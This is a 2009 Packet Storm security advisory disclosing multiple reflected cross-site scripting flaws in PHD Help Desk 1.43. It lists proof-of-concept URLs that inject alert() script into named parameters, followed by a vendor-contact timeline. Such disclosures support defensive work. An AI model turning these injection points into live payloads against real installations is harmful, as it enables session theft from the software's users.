exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHD Help Desk 1.43 Cross Site Scripting

PHD Help Desk 1.43 Cross Site Scripting
Posted Nov 18, 2009
Authored by Amol Naik

PHD Help Desk version 1.43 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 9e31d678e762edb548c87400979bdc81a4269333d3425fb379c8406bf176fc71

PHD Help Desk 1.43 Cross Site Scripting

Change Mirror Download
  
################################################################################
Mutliple XSS in PHD Help Desk v1.43

Name Multiple vulnerabilities in PHD Help Dsk
Systems Affected PHD Help Desk v1.43 and possibly earlier versions
Site http://www.p-hd.com.ar/
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################


############
1. OVERVIEW
############

PHD Help Desk is the software conceived for the registry and follow up of incidents in the Help Desk or Service Desk in your IT area of their company or organization.

###############
2. DESCRIPTION
###############

PHD Help Desk is vulnerable to Multiple cross-site scripting instances.

######################
3. TECHNICAL DETAILS
######################

Multiple Cross-site Scripting
++++++++++++++++++++++++++++++

Multiple pages found vulnerable to Cross-site Scripting mainly due to improper use of $_SERVER['PHP_SELF'] and lack of sanitization in user inputs.

++++
POC
++++

http://localhost/phd/area.php/'><script>alert("XSS")</script>
http://localhost/phd/area.php?pagina='><script>alert("XSS")</script>
http://localhost/phd/area.php?sentido='><script>alert("XSS")</script>
http://localhost/phd/area.php?q_registros='><script>alert("XSS")</script>
http://localhost/phd/area.php?orden='><script>alert("XSS")</script>
http://localhost/phd/solic_display.php?pagina=1&q_registros=><script>alert("XSS")</script>&orden=seq_solicitud_id
http://localhost/phd/area_list.php/'><script>alert("XSS")</script>
http://localhost/phd/area_list.php?orden=nombre&sentido=&pagina=1&q_registros=0'><script>alert("XSS")</script>
http://localhost/phd/atributo.php/'><script>alert("XSS")</script>
http://localhost/phd/atributo_list.php?pagina=1'><script>alert("XSS")</script>&q_registros=15&orden=activo&sentido=
http://localhost/phd/atributo_list.php?pagina=1&q_registros=15'><script>alert("XSS")</script>&orden=activo&sentido=
http://localhost/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo'><script>alert("XSS")</script>&sentido=
http://localhost/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido='><script>alert("XSS")</script>
http://localhost/phd/caso_insert.php/'><script>alert("XSS")</script>


Other pages may be vulnerable as well.


############
4. TimeLine
############

05/11/2009 Bug Discovered
05/11/2009 Reported to Vendor
05/11/2009 Vendor agrees to fix this in 2.00 version

Response from Vendor:
"I forgot to protect the $_GET entries, we are working in the 2.00 version and we will add this sugestion."

16/11/2009 Public Disclosure
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close